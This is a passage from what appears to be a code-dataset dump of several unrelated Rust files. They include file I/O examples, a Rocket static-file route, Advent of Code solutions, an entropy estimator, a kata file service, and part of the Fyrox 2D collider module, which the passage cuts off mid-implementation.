pub fn readline_and_print() -> io::Result<()> {
    let reader = BufReader::new(File::open(
        "/Users/liwei/coding/rust/git/rust/basic/fs/Cargo.toml",
    )?);
    // `flatten` silently skips lines that fail to read — exactly what the
    // previous `if let Ok(..)` filter did.
    for line in reader.lines().flatten() {
        println!("{:?}", line);
    }
    Ok(())
}
// Write content to a file.
//
// `OpenOptions` lets several flags be combined: here the handle is opened
// read + write; `create(true)` creates the file when missing and reuses it
// otherwise (`create_new(true)` would instead fail with "File exists" for
// an existing file), and `append(true)` makes every write go to the end.
//
// # Errors
// Propagates any I/O error from opening or writing. (The previous version
// printed the open error and still returned `Ok(())`, so callers could
// never observe a failure despite the `io::Result` signature.)
pub fn file_append() -> io::Result<()> {
    let filename = "foo.txt";
    let mut stream = OpenOptions::new()
        .read(true)
        .write(true)
        .create(true)
        .append(true)
        .open(filename)?;
    stream.write_all(b"hello, world!\n")?;
    Ok(())
}
// List the current directory.
// `fs::read_dir` yields the directory's entries together with per-entry
// metadata (path, file name, file type).
use std::fs;
pub fn list_dir() {
    let entries = match fs::read_dir(".") {
        Ok(entries) => entries,
        // Unreadable directory: print nothing, exactly like the previous
        // `if let Ok(..)` guard.
        Err(_) => return,
    };
    for entry in entries {
        println!("entry:{:?}", entry);
        match entry {
            Ok(e) => {
                println!("path:{:?}", e.path());
                println!("file_name:{:?}", e.file_name());
                println!("file_type:{:?}", e.file_type());
            }
            Err(_) => {}
        }
    }
}
| true |
8c29a20db0de6aa8200089dbdbb26bfb7a0b486a
|
Rust
|
steadylearner/Rust-Full-Stack
|
/React_Rust/server/rocket/src/routes/static_files.rs
|
UTF-8
| 370 | 2.765625 | 3 |
[
"MIT"
] |
permissive
|
use std::path::{Path, PathBuf};
use rocket::response::NamedFile;
// Mirrors Express's static-file serving structure.
// Without this catch-all route the server reports it couldn't find `/` or `/user`;
// the alternative is to manually edit index.html and the other asset paths (images etc.).
/// Serves a file from the local `public/` directory, e.g. `GET /app.js`
/// returns `public/app.js`.
///
/// Returns `None` when the file cannot be opened, which Rocket turns into
/// a 404 response. NOTE(review): a `PathBuf` built from a `<file..>`
/// segment is sanitised by Rocket against path traversal — confirm for
/// the Rocket version in use.
#[get("/<file..>")]
pub fn file(file: PathBuf) -> Option<NamedFile> {
    NamedFile::open(Path::new("public/").join(file)).ok()
}
| true |
8639cd2e8894359c774916daeaf0faf455b32d86
|
Rust
|
dhconnelly/advent-of-code-2020
|
/day10/src/main.rs
|
UTF-8
| 1,437 | 3.53125 | 4 |
[] |
no_license
|
use std::collections::HashMap;
/// Parses a base-10 signed integer, panicking with a message on malformed
/// input (acceptable here: the puzzle input is trusted).
fn atoi(s: &str) -> i64 {
    s.parse().expect("invalid integer in input")
}
/// Counts adjacent pairs in `chain` whose difference is exactly `of`.
///
/// Returns 0 for empty or single-element slices (the previous version
/// panicked on an empty slice when indexing `chain[0]`).
fn differences(chain: &[i64], of: i64) -> usize {
    chain.windows(2).filter(|w| w[1] - w[0] == of).count()
}
// how many valid chains include |from| and any nums greater than |from|?
//
// Top-down DP with memoization over the sorted adapter list: from index
// `from` the chain may continue at the next one, two or three entries,
// provided the joltage gap stays <= 3. The jump to `from + 1` is taken
// unconditionally — presumably the sorted input guarantees adjacent gaps
// of at most 3 (TODO confirm against the puzzle statement).
//
// NOTE: callers must pre-seed `memo` with 1 for the final two indices
// (see `main`); without those base cases every path would bottom out in
// the `from >= nums.len()` branch and all counts would collapse to 0.
fn count(nums: &[i64], from: usize, memo: &mut HashMap<usize, i64>) -> i64 {
    if let Some(n) = memo.get(&from) {
        return *n;
    } else if from >= nums.len() {
        return 0;
    }
    let cur = nums[from];
    let (a, b, c) = (from + 1, from + 2, from + 3);
    let mut sum = count(nums, a, memo); // 1 X X
    if b < nums.len() && nums[b] - cur <= 3 {
        sum += count(nums, b, memo); // 0 1 X
    }
    if c < nums.len() && nums[c] - cur <= 3 {
        sum += count(nums, c, memo); // 0 0 1
    }
    memo.insert(from, sum);
    sum
}
// Day 10: read the adapter joltages, add the outlet (0) and the built-in
// device (max + 3), then print the part 1 and part 2 answers.
fn main() {
    let path = std::env::args().nth(1).unwrap();
    let text = std::fs::read_to_string(&path).unwrap();
    let mut nums: Vec<_> = text.lines().map(atoi).collect();
    // The wall outlet rates 0 jolts; the device is 3 above the highest adapter.
    nums.push(0);
    nums.sort();
    nums.push(nums[nums.len() - 1] + 3);
    // Part 1: product of the number of 1-jolt and 3-jolt gaps.
    println!("{}", differences(&nums, 1) * differences(&nums, 3));
    // Part 2: seed the DP base cases — a chain starting at either of the
    // two last entries can be completed in exactly one way.
    let mut memo = HashMap::new();
    memo.insert(nums.len() - 2, 1);
    memo.insert(nums.len() - 1, 1);
    println!("{}", count(&nums, 0, &mut memo));
}
| true |
0e04a25ff39562e59f0d05069e0010fdff5f36d1
|
Rust
|
Misha007007/approx_entropy
|
/src/estimator/naive.rs
|
UTF-8
| 1,662 | 3.578125 | 4 |
[
"Apache-2.0",
"MIT"
] |
permissive
|
use thiserror::Error;
/// Naive entropy estimator.
///
/// It assumes the empirical distribution is almost the real distribution,
/// which is asymptotically true.
#[derive(Debug)]
pub struct NaiveEstimator<'a> {
    /// Unnormalized counts per bin.
    unnorm_distr: &'a [usize],
}
/// Error returned by [`NaiveEstimator::new`] when every bin is empty.
#[derive(Error, Debug)]
#[error("Invalid unnormalized distribution: there must be at least one sample.")]
pub struct NullDistribution;
impl<'a> NaiveEstimator<'a> {
    /// Validates that the distribution contains at least one sample.
    ///
    /// # Errors
    /// Returns [`NullDistribution`] when all counts are zero.
    pub fn new(unnorm_distr: &'a [usize]) -> Result<Self, NullDistribution> {
        if unnorm_distr.iter().sum::<usize>() == 0 {
            return Err(NullDistribution);
        }
        Ok(NaiveEstimator::new_unchecked(unnorm_distr))
    }
    /// Builds the estimator without checking for an all-zero distribution;
    /// calling `entropy` on such input divides by zero (yielding NaN).
    pub fn new_unchecked(unnorm_distr: &'a [usize]) -> Self {
        NaiveEstimator { unnorm_distr }
    }
    /// Plug-in (maximum-likelihood) entropy of the normalized
    /// distribution in nats: `-Σ pᵢ ln pᵢ` with `pᵢ = nᵢ / N`.
    ///
    /// Zero-count bins are skipped, applying the convention `0·ln 0 = 0`.
    /// (Previously a zero bin computed `0.0 * -inf = NaN`, poisoning the
    /// whole result.)
    pub fn entropy(&self) -> f64 {
        let total = self.unnorm_distr.iter().sum::<usize>() as f64;
        // Hoist the loop-invariant logarithm of the total count.
        let ln_total = total.ln();
        let mut entropy = 0.0;
        for reps in self.unnorm_distr.iter().filter(|&&n| n > 0).map(|&n| n as f64) {
            entropy -= reps * (reps.ln() - ln_total);
        }
        entropy / total
    }
}
#[cfg(test)]
mod tests {
    use super::*;
    use float_eq::assert_float_eq;
    use test_case::test_case;
    // A uniform distribution over k non-empty bins has entropy ln(k);
    // the "increasing" case pins a precomputed reference value.
    #[test_case(&[11], 0.; "uniform_one")]
    #[test_case(&[1; 4], 4.0_f64.ln(); "uniform_four")]
    #[test_case(&[1; 8], 8.0_f64.ln(); "uniform_eight")]
    #[test_case(&[1, 2, 3, 4, 5, 6], 1.66237699; "increasing")]
    fn entropy(unnorm_distr: &[usize], expected: f64) {
        let naive_estimator = NaiveEstimator::new(unnorm_distr).unwrap();
        assert_float_eq!(naive_estimator.entropy(), expected, abs <= 1e-6);
    }
}
| true |
5ce95a77d73deb61cbe0dd0445ab9a332f69f5cd
|
Rust
|
Fadi88/AoC
|
/2021/day22/main.rs
|
UTF-8
| 3,843 | 2.875 | 3 |
[
"Unlicense"
] |
permissive
|
use regex::Regex;
use std::cmp::{max, min};
use std::collections::HashSet;
use std::time;
// Runs `f` and prints how long it took.
fn bench(f: fn()) {
    let start = time::Instant::now();
    f();
    println!("time used {:?}", start.elapsed());
}
// Part 1: brute-force voxel simulation restricted to the ±50 region.
// Each input line is "on|off x=a..b,y=c..d,z=e..f"; the regex captures
// the six bounds in order.
//
// NOTE(review): the upper clamp `min(50, t[_] + 1)` feeds an exclusive
// range, so cells at coordinate exactly 50 are never toggled — likely
// benign if the initialization cuboids stay within ±49, but worth
// confirming against the input.
fn part_1() {
    let re = Regex::new(r".*=(-?\d+)\.+(-?\d+).*=(-?\d+)\.+(-?\d+).*=(-?\d+)\.+(-?\d+)").unwrap();
    let mut pts: HashSet<(i32, i32, i32)> = HashSet::new();
    for l in include_str!("input.txt").split("\n") {
        let t: Vec<_> = re
            .captures(l)
            .unwrap()
            .iter()
            .skip(1)
            .map(|x| x.unwrap().as_str().parse::<i32>().unwrap())
            .collect();
        // Skip cuboids lying entirely outside the ±50 region.
        if t[0] > 50 || t[1] < -50 || t[2] > 50 || t[3] < -50 || t[4] > 50 || t[5] < -50 {
            continue;
        }
        // Clamp to the region and toggle every covered cell.
        for x in max(t[0], -50)..min(50, t[1] + 1) {
            for y in max(t[2], -50)..min(50, t[3] + 1) {
                for z in max(t[4], -50)..min(50, t[5] + 1) {
                    if l.contains("on") {
                        pts.insert((x, y, z));
                    } else {
                        pts.remove(&(x, y, z));
                    }
                }
            }
        }
    }
    println!("{}", pts.len());
}
/// True when the closed intervals `[x0, x1]` and `[ox0, ox1]` overlap,
/// including merely touching at an endpoint.
///
/// Uses the canonical two-comparison overlap test, which is equivalent to
/// the previous four-clause version for well-formed intervals
/// (`x0 <= x1` and `ox0 <= ox1`) — the only kind `Cuboid` produces.
fn does_line_intersect(x0: i64, x1: i64, ox0: i64, ox1: i64) -> bool {
    x0 <= ox1 && ox0 <= x1
}
/// Intersection of two overlapping closed intervals, as `(start, end)`.
fn get_line_intersection(p0: i64, p1: i64, op0: i64, op1: i64) -> (i64, i64) {
    (p0.max(op0), p1.min(op1))
}
/// Axis-aligned box with inclusive integer bounds, plus the list of
/// regions that later cuboids have carved out of it.
struct Cuboid {
    x0: i64,
    x1: i64,
    y0: i64,
    y1: i64,
    z0: i64,
    z1: i64,
    // Intersections with cuboids processed after this one; their volume
    // is discounted in `volume()` so no cell is counted twice.
    off: Vec<Cuboid>,
}
// NOTE(review): method names kept as-is ("is_intresecting",
// "substraction") to avoid touching call sites.
impl Cuboid {
    /// Builds a cuboid covering `[x0, x1] × [y0, y1] × [z0, z1]`
    /// (inclusive bounds) with no carved-out regions yet.
    pub fn new(x0: i64, x1: i64, y0: i64, y1: i64, z0: i64, z1: i64) -> Self {
        return Cuboid {
            x0: x0,
            x1: x1,
            y0: y0,
            y1: y1,
            z0: z0,
            z1: z1,
            off: Vec::new(),
        };
    }
    /// True when `self` and `other` overlap on all three axes.
    fn is_intresecting(&self, other: &Cuboid) -> bool {
        does_line_intersect(self.x0, self.x1, other.x0, other.x1)
            && does_line_intersect(self.y0, self.y1, other.y0, other.y1)
            && does_line_intersect(self.z0, self.z1, other.z0, other.z1)
    }
    /// Removes `other`'s region from this cuboid's effective volume.
    ///
    /// The overlap is first subtracted from every already-recorded
    /// overlap (so the shared region is not discounted twice) and then
    /// appended to `off`.
    pub fn substraction(&mut self, other: &Cuboid) {
        if self.is_intresecting(other) {
            let x = get_line_intersection(self.x0, self.x1, other.x0, other.x1);
            let y = get_line_intersection(self.y0, self.y1, other.y0, other.y1);
            let z = get_line_intersection(self.z0, self.z1, other.z0, other.z1);
            self.off.iter_mut().for_each(|x| x.substraction(other));
            self.off.push(Cuboid::new(x.0, x.1, y.0, y.1, z.0, z.1));
        }
    }
    /// Effective volume: the full box minus the volume of all carved-out
    /// overlaps, each computed recursively the same way.
    pub fn volume(&self) -> u128 {
        ((self.x1 - self.x0 + 1) as u128
            * (self.y1 - self.y0 + 1) as u128
            * (self.z1 - self.z0 + 1) as u128)
            - self.off.iter().map(|x| x.volume()).sum::<u128>()
    }
}
// Part 2: exact volume over the full (unclamped) space via cuboid
// subtraction. Every new cuboid is first subtracted from all previously
// kept "on" cuboids so overlapping cells are counted exactly once; it is
// then retained only if it switches cells on.
fn part_2() {
    let re = Regex::new(r".*=(-?\d+)\.+(-?\d+).*=(-?\d+)\.+(-?\d+).*=(-?\d+)\.+(-?\d+)").unwrap();
    let mut cubiods: Vec<Cuboid> = Vec::new();
    for l in include_str!("input.txt").split("\n") {
        let t: Vec<_> = re
            .captures(l)
            .unwrap()
            .iter()
            .skip(1)
            .map(|x| x.unwrap().as_str().parse::<i64>().unwrap())
            .collect();
        let new_c = Cuboid::new(t[0], t[1], t[2], t[3], t[4], t[5]);
        cubiods.iter_mut().for_each(|x| x.substraction(&new_c));
        if l.contains("on") {
            cubiods.push(new_c);
        }
    }
    // Total "on" volume = sum of each kept cuboid's effective volume.
    let s = cubiods.iter().map(|x| x.volume() as u128).sum::<u128>();
    println!("{}", s);
}
fn main() {
    // Run and time both parts; `bench` prints the elapsed duration.
    bench(part_1);
    bench(part_2);
}
| true |
d7fcddec0ab9d1dea6de86460ae415bb68d8bdc1
|
Rust
|
iGetSchwifty/kata-rs
|
/kata/src/services/file_service.rs
|
UTF-8
| 3,442 | 3.390625 | 3 |
[] |
no_license
|
use std::fs::File;
use std::io::{self, BufRead};
use std::path::Path;
use super::super::models::data_type::*;
use super::super::models::kata_error::*;
/// Opens `filename` and returns a buffered iterator over its lines.
pub fn read_lines(filename: Box<&Path>) -> io::Result<io::Lines<io::BufReader<File>>> {
    Ok(io::BufReader::new(File::open(*filename)?).lines())
}
/// Checks that a filename argument was supplied (`args[1]`) and that it
/// points to an existing path; returns the boxed path on success.
pub fn validate_file(args: &Vec<String>) -> Result<Box<&Path>, KataError> {
    if args.len() < 2 {
        return Err(KataError::new("Not enough arguments! Missing filename."));
    }
    let file_name = Path::new(&args[1]);
    if !file_name.exists() {
        return Err(KataError::new("Path does not exist!"));
    }
    Ok(Box::new(file_name))
}
/// Classifies a raw input line as a Driver record ("Driver <name>"),
/// a Trip record ("Trip <name> <start> <end> <miles>"), or Unknown.
pub fn validate_line_type(data: &str) -> DataType {
    let tokens: Vec<&str> = data.split(' ').collect();
    let is_driver = tokens.len() == 2 && tokens[0] == "Driver";
    let is_trip = tokens.len() == 5 && tokens[0] == "Trip";
    if is_driver {
        DataType::Driver(tokens[1].to_string())
    } else if is_trip {
        // The Trip variant keeps the full token list for later parsing.
        DataType::Trip(tokens[1].to_string(), tokens)
    } else {
        DataType::Unknown
    }
}
#[cfg(test)]
mod tests {
    use super::*;
    use super::super::super::models::data_type::DataType::*;
    #[test]
    fn test_validate_file_errors_less_than_two_paramets() {
        // Only the program name is present — no filename argument.
        let new_vec: Vec<String> = vec!["value".to_string()];
        let test_instance = validate_file(&new_vec);
        assert!(test_instance.is_err());
        assert!(test_instance.is_ok() == false);
        if let Err(result) = test_instance {
            assert_eq!(result.message, "Not enough arguments! Missing filename.");
        }
    }
    #[test]
    fn test_validate_file_returns_path_error() {
        // "filename" does not exist on disk.
        let new_vec: Vec<String> = vec!["value".to_string(), "filename".to_string()];
        let test_instance = validate_file(&new_vec);
        assert!(test_instance.is_err());
        assert!(test_instance.is_ok() == false);
        if let Err(result) = test_instance {
            assert_eq!(result.message, "Path does not exist!");
        }
    }
    //
    // Could be coding to an interface to avoid this and to actually test with mocks..
    // Since this is a kata not going to go that far
    //
    // Unix-only because it relies on "/" always existing.
    #[cfg(unix)]
    #[test]
    fn test_validate_file_valid() {
        let new_vec: Vec<String> = vec!["value".to_string(), "/".to_string()];
        let test_instance = validate_file(&new_vec);
        assert!(test_instance.is_err() == false);
        assert!(test_instance.is_ok());
        if let Ok(result) = test_instance {
            assert_eq!(*result, Path::new("/"));
        }
    }
    #[test]
    fn test_validate_line_type_driver() {
        if let Driver(result) = validate_line_type("Driver TestName") {
            assert_eq!(result, "TestName");
        } else {
            assert!(false);
        }
    }
    #[test]
    fn test_validate_line_type_trip() {
        // The Trip variant carries both the name and the full token list.
        if let Trip(result, line_tokens) = validate_line_type("Trip TestName 07:15 07:45 17.3") {
            assert_eq!(result, "TestName");
            assert_eq!(line_tokens, ["Trip", "TestName", "07:15", "07:45", "17.3"].to_vec());
        } else {
            assert!(false);
        }
    }
    #[test]
    fn test_validate_line_type_unknown() {
        // Anything that is neither a Driver nor a Trip record.
        match validate_line_type("Test TestName") {
            Trip(_, _) => assert!(false),
            Driver(_) => assert!(false),
            Unknown => assert!(true)
        };
    }
}
| true |
b93d05d7db2c2217b5d5a3f1acf1aedc04e073ea
|
Rust
|
FyroxEngine/Fyrox
|
/src/scene/dim2/collider.rs
|
UTF-8
| 25,230 | 2.65625 | 3 |
[
"MIT"
] |
permissive
|
//! Collider is a geometric entity that can be attached to a rigid body to allow participate it
//! participate in contact generation, collision response and proximity queries.
use crate::{
core::{
algebra::Vector2,
log::Log,
math::aabb::AxisAlignedBoundingBox,
pool::Handle,
reflect::prelude::*,
uuid::{uuid, Uuid},
variable::InheritableVariable,
visitor::prelude::*,
TypeUuidProvider,
},
scene::{
base::{Base, BaseBuilder},
collider::InteractionGroups,
dim2::{
physics::{ContactPair, IntersectionPair, PhysicsWorld},
rigidbody::RigidBody,
},
graph::{physics::CoefficientCombineRule, Graph},
node::{Node, NodeTrait, SyncContext},
Scene,
},
};
use rapier2d::geometry::ColliderHandle;
use std::{
cell::Cell,
ops::{Deref, DerefMut},
};
use strum_macros::{AsRefStr, EnumString, EnumVariantNames};
/// Ball is an idea sphere shape defined by a single parameters - its radius.
#[derive(Clone, Debug, Visit, PartialEq, Reflect)]
pub struct BallShape {
/// Radius of the sphere.
#[reflect(min_value = 0.001, step = 0.05)]
pub radius: f32,
}
impl Default for BallShape {
fn default() -> Self {
Self { radius: 0.5 }
}
}
/// Cuboid shape (rectangle).
#[derive(Clone, Debug, Visit, PartialEq, Reflect)]
pub struct CuboidShape {
/// Half extents of the box. X - half width, Y - half height.
/// Actual _size_ will be 2 times bigger.
#[reflect(min_value = 0.001, step = 0.05)]
pub half_extents: Vector2<f32>,
}
impl Default for CuboidShape {
fn default() -> Self {
Self {
half_extents: Vector2::new(0.5, 0.5),
}
}
}
/// Arbitrary capsule shape defined by 2 points (which forms axis) and a radius.
#[derive(Clone, Debug, Visit, PartialEq, Reflect)]
pub struct CapsuleShape {
/// Begin point of the capsule.
pub begin: Vector2<f32>,
/// End point of the capsule.
pub end: Vector2<f32>,
/// Radius of the capsule.
#[reflect(min_value = 0.001, step = 0.05)]
pub radius: f32,
}
impl Default for CapsuleShape {
// Y-capsule
fn default() -> Self {
Self {
begin: Default::default(),
end: Vector2::new(0.0, 1.0),
radius: 0.5,
}
}
}
/// Arbitrary segment shape defined by two points.
#[derive(Clone, Debug, Visit, PartialEq, Reflect)]
pub struct SegmentShape {
/// Begin point of the capsule.
pub begin: Vector2<f32>,
/// End point of the capsule.
pub end: Vector2<f32>,
}
impl Default for SegmentShape {
fn default() -> Self {
Self {
begin: Default::default(),
end: Vector2::new(0.0, 1.0),
}
}
}
/// Arbitrary triangle shape.
#[derive(Clone, Debug, Visit, PartialEq, Reflect)]
pub struct TriangleShape {
/// First point of the triangle shape.
pub a: Vector2<f32>,
/// Second point of the triangle shape.
pub b: Vector2<f32>,
/// Third point of the triangle shape.
pub c: Vector2<f32>,
}
impl Default for TriangleShape {
fn default() -> Self {
Self {
a: Default::default(),
b: Vector2::new(1.0, 0.0),
c: Vector2::new(0.0, 1.0),
}
}
}
/// Geometry source for colliders with complex geometry.
///
/// # Notes
///
/// Currently there is only one way to set geometry - using a scene node as a source of data.
#[derive(Default, Clone, Copy, PartialEq, Hash, Debug, Visit, Reflect, Eq)]
pub struct GeometrySource(pub Handle<Node>);
/// Arbitrary triangle mesh shape.
#[derive(Default, Clone, Debug, PartialEq, Visit, Reflect, Eq)]
pub struct TrimeshShape {
/// Geometry sources for the shape.
pub sources: Vec<GeometrySource>,
}
/// Arbitrary height field shape.
#[derive(Default, Clone, Debug, PartialEq, Visit, Reflect, Eq)]
pub struct HeightfieldShape {
/// A handle to terrain scene node.
pub geometry_source: GeometrySource,
}
/// Possible collider shapes.
#[derive(Clone, Debug, Visit, Reflect, AsRefStr, PartialEq, EnumString, EnumVariantNames)]
pub enum ColliderShape {
/// See [`BallShape`] docs.
Ball(BallShape),
/// See [`CuboidShape`] docs.
Cuboid(CuboidShape),
/// See [`CapsuleShape`] docs.
Capsule(CapsuleShape),
/// See [`SegmentShape`] docs.
Segment(SegmentShape),
/// See [`TriangleShape`] docs.
Triangle(TriangleShape),
/// See [`TrimeshShape`] docs.
Trimesh(TrimeshShape),
/// See [`HeightfieldShape`] docs.
Heightfield(HeightfieldShape),
}
impl Default for ColliderShape {
fn default() -> Self {
Self::Ball(Default::default())
}
}
impl ColliderShape {
/// Initializes a ball shape defined by its radius.
pub fn ball(radius: f32) -> Self {
Self::Ball(BallShape { radius })
}
/// Initializes a cuboid shape defined by its half-extents.
pub fn cuboid(hx: f32, hy: f32) -> Self {
Self::Cuboid(CuboidShape {
half_extents: Vector2::new(hx, hy),
})
}
/// Initializes a capsule shape from its endpoints and radius.
pub fn capsule(begin: Vector2<f32>, end: Vector2<f32>, radius: f32) -> Self {
Self::Capsule(CapsuleShape { begin, end, radius })
}
/// Initializes a new collider builder with a capsule shape aligned with the `x` axis.
pub fn capsule_x(half_height: f32, radius: f32) -> Self {
let p = Vector2::x() * half_height;
Self::capsule(-p, p, radius)
}
/// Initializes a new collider builder with a capsule shape aligned with the `y` axis.
pub fn capsule_y(half_height: f32, radius: f32) -> Self {
let p = Vector2::y() * half_height;
Self::capsule(-p, p, radius)
}
/// Initializes a segment shape from its endpoints.
pub fn segment(begin: Vector2<f32>, end: Vector2<f32>) -> Self {
Self::Segment(SegmentShape { begin, end })
}
/// Initializes a triangle shape.
pub fn triangle(a: Vector2<f32>, b: Vector2<f32>, c: Vector2<f32>) -> Self {
Self::Triangle(TriangleShape { a, b, c })
}
/// Initializes a triangle mesh shape defined by a set of handles to mesh nodes that will be
/// used to create physical shape.
pub fn trimesh(geometry_sources: Vec<GeometrySource>) -> Self {
Self::Trimesh(TrimeshShape {
sources: geometry_sources,
})
}
/// Initializes a heightfield shape defined by a handle to terrain node.
pub fn heightfield(geometry_source: GeometrySource) -> Self {
Self::Heightfield(HeightfieldShape { geometry_source })
}
}
/// Collider is a geometric entity that can be attached to a rigid body to allow participate it
/// participate in contact generation, collision response and proximity queries.
#[derive(Reflect, Visit, Debug)]
pub struct Collider {
base: Base,
#[reflect(setter = "set_shape")]
pub(crate) shape: InheritableVariable<ColliderShape>,
#[reflect(min_value = 0.0, step = 0.05, setter = "set_friction")]
pub(crate) friction: InheritableVariable<f32>,
#[reflect(setter = "set_density")]
pub(crate) density: InheritableVariable<Option<f32>>,
#[reflect(min_value = 0.0, step = 0.05, setter = "set_restitution")]
pub(crate) restitution: InheritableVariable<f32>,
#[reflect(setter = "set_is_sensor")]
pub(crate) is_sensor: InheritableVariable<bool>,
#[reflect(setter = "set_collision_groups")]
pub(crate) collision_groups: InheritableVariable<InteractionGroups>,
#[reflect(setter = "set_solver_groups")]
pub(crate) solver_groups: InheritableVariable<InteractionGroups>,
#[reflect(setter = "set_friction_combine_rule")]
pub(crate) friction_combine_rule: InheritableVariable<CoefficientCombineRule>,
#[reflect(setter = "set_restitution_combine_rule")]
pub(crate) restitution_combine_rule: InheritableVariable<CoefficientCombineRule>,
#[visit(skip)]
#[reflect(hidden)]
pub(crate) native: Cell<ColliderHandle>,
}
impl Default for Collider {
fn default() -> Self {
Self {
base: Default::default(),
shape: Default::default(),
friction: Default::default(),
density: Default::default(),
restitution: Default::default(),
is_sensor: Default::default(),
collision_groups: Default::default(),
solver_groups: Default::default(),
friction_combine_rule: Default::default(),
restitution_combine_rule: Default::default(),
native: Cell::new(ColliderHandle::invalid()),
}
}
}
impl Deref for Collider {
type Target = Base;
fn deref(&self) -> &Self::Target {
&self.base
}
}
impl DerefMut for Collider {
fn deref_mut(&mut self) -> &mut Self::Target {
&mut self.base
}
}
impl Clone for Collider {
fn clone(&self) -> Self {
Self {
base: self.base.clone(),
shape: self.shape.clone(),
friction: self.friction.clone(),
density: self.density.clone(),
restitution: self.restitution.clone(),
is_sensor: self.is_sensor.clone(),
collision_groups: self.collision_groups.clone(),
solver_groups: self.solver_groups.clone(),
friction_combine_rule: self.friction_combine_rule.clone(),
restitution_combine_rule: self.restitution_combine_rule.clone(),
// Do not copy. The copy will have its own native representation.
native: Cell::new(ColliderHandle::invalid()),
}
}
}
impl TypeUuidProvider for Collider {
    /// Stable UUID identifying this node type to Fyrox's
    /// reflection/serialization machinery.
    fn type_uuid() -> Uuid {
        uuid!("2b1659ea-a116-4224-bcd4-7931e3ae3b40")
    }
}
impl Collider {
    /// Sets the new shape to the collider.
    ///
    /// # Performance
    ///
    /// This is relatively expensive operation - it forces the physics engine to recalculate contacts,
    /// perform collision response, etc. Try avoid calling this method each frame for better
    /// performance.
    // NOTE(review): all setters below delegate to `set_value_and_mark_modified`,
    // which flags the property so `needs_sync_model()` reports a pending change;
    // the returned value is presumably the previous one — confirm against the
    // template-variable docs.
    pub fn set_shape(&mut self, shape: ColliderShape) -> ColliderShape {
        self.shape.set_value_and_mark_modified(shape)
    }
    /// Returns shared reference to the collider shape.
    pub fn shape(&self) -> &ColliderShape {
        &self.shape
    }
    /// Returns a copy of the collider shape.
    pub fn shape_value(&self) -> ColliderShape {
        (*self.shape).clone()
    }
    /// Returns mutable reference to the current collider shape.
    ///
    /// # Performance
    ///
    /// This is relatively expensive operation - it forces the physics engine to recalculate contacts,
    /// perform collision response, etc. Try avoid calling this method each frame for better
    /// performance.
    pub fn shape_mut(&mut self) -> &mut ColliderShape {
        self.shape.get_value_mut_and_mark_modified()
    }
    /// Sets the new restitution value. The exact meaning of possible values is somewhat complex,
    /// check [Wikipedia page](https://en.wikipedia.org/wiki/Coefficient_of_restitution) for more
    /// info.
    ///
    /// # Performance
    ///
    /// This is relatively expensive operation - it forces the physics engine to recalculate contacts,
    /// perform collision response, etc. Try avoid calling this method each frame for better
    /// performance.
    pub fn set_restitution(&mut self, restitution: f32) -> f32 {
        self.restitution.set_value_and_mark_modified(restitution)
    }
    /// Returns current restitution value of the collider.
    pub fn restitution(&self) -> f32 {
        *self.restitution
    }
    /// Sets the new density value of the collider. Density defines actual mass of the rigid body to
    /// which the collider is attached. Final mass will be a sum of `ColliderVolume * ColliderDensity`
    /// of each collider. In case if density is undefined, the mass of the collider will be zero,
    /// which will lead to two possible effects:
    ///
    /// 1) If a rigid body to which collider is attached have no additional mass, then the rigid body
    /// won't rotate, only move.
    /// 2) If the rigid body have some additional mass, then the rigid body will have normal behaviour.
    ///
    /// # Performance
    ///
    /// This is relatively expensive operation - it forces the physics engine to recalculate contacts,
    /// perform collision response, etc. Try avoid calling this method each frame for better
    /// performance.
    pub fn set_density(&mut self, density: Option<f32>) -> Option<f32> {
        self.density.set_value_and_mark_modified(density)
    }
    /// Returns current density of the collider.
    pub fn density(&self) -> Option<f32> {
        *self.density
    }
    /// Sets friction coefficient for the collider. The greater value is the more kinematic energy
    /// will be converted to heat (in other words - lost), the parent rigid body will slowdown much
    /// faster and so on.
    ///
    /// # Performance
    ///
    /// This is relatively expensive operation - it forces the physics engine to recalculate contacts,
    /// perform collision response, etc. Try avoid calling this method each frame for better
    /// performance.
    pub fn set_friction(&mut self, friction: f32) -> f32 {
        self.friction.set_value_and_mark_modified(friction)
    }
    /// Return current friction of the collider.
    pub fn friction(&self) -> f32 {
        *self.friction
    }
    /// Sets the new collision filtering options. See [`InteractionGroups`] docs for more info.
    ///
    /// # Performance
    ///
    /// This is relatively expensive operation - it forces the physics engine to recalculate contacts,
    /// perform collision response, etc. Try avoid calling this method each frame for better
    /// performance.
    pub fn set_collision_groups(&mut self, groups: InteractionGroups) -> InteractionGroups {
        self.collision_groups.set_value_and_mark_modified(groups)
    }
    /// Returns current collision filtering options.
    pub fn collision_groups(&self) -> InteractionGroups {
        *self.collision_groups
    }
    /// Sets the new joint solver filtering options. See [`InteractionGroups`] docs for more info.
    ///
    /// # Performance
    ///
    /// This is relatively expensive operation - it forces the physics engine to recalculate contacts,
    /// perform collision response, etc. Try avoid calling this method each frame for better
    /// performance.
    pub fn set_solver_groups(&mut self, groups: InteractionGroups) -> InteractionGroups {
        self.solver_groups.set_value_and_mark_modified(groups)
    }
    /// Returns current solver groups.
    pub fn solver_groups(&self) -> InteractionGroups {
        *self.solver_groups
    }
    /// If true is passed, the method makes collider a sensor. Sensors will not participate in
    /// collision response, but it is still possible to query contact information from them.
    ///
    /// # Performance
    ///
    /// This is relatively expensive operation - it forces the physics engine to recalculate contacts,
    /// perform collision response, etc. Try avoid calling this method each frame for better
    /// performance.
    pub fn set_is_sensor(&mut self, is_sensor: bool) -> bool {
        self.is_sensor.set_value_and_mark_modified(is_sensor)
    }
    /// Returns true if the collider is sensor, false - otherwise.
    pub fn is_sensor(&self) -> bool {
        *self.is_sensor
    }
    /// Sets the new friction combine rule. See [`CoefficientCombineRule`] docs for more info.
    ///
    /// # Performance
    ///
    /// This is relatively expensive operation - it forces the physics engine to recalculate contacts,
    /// perform collision response, etc. Try avoid calling this method each frame for better
    /// performance.
    pub fn set_friction_combine_rule(
        &mut self,
        rule: CoefficientCombineRule,
    ) -> CoefficientCombineRule {
        self.friction_combine_rule.set_value_and_mark_modified(rule)
    }
    /// Returns current friction combine rule of the collider.
    pub fn friction_combine_rule(&self) -> CoefficientCombineRule {
        *self.friction_combine_rule
    }
    /// Sets the new restitution combine rule. See [`CoefficientCombineRule`] docs for more info.
    ///
    /// # Performance
    ///
    /// This is relatively expensive operation - it forces the physics engine to recalculate contacts,
    /// perform collision response, etc. Try avoid calling this method each frame for better
    /// performance.
    pub fn set_restitution_combine_rule(
        &mut self,
        rule: CoefficientCombineRule,
    ) -> CoefficientCombineRule {
        self.restitution_combine_rule
            .set_value_and_mark_modified(rule)
    }
    /// Returns current restitution combine rule of the collider.
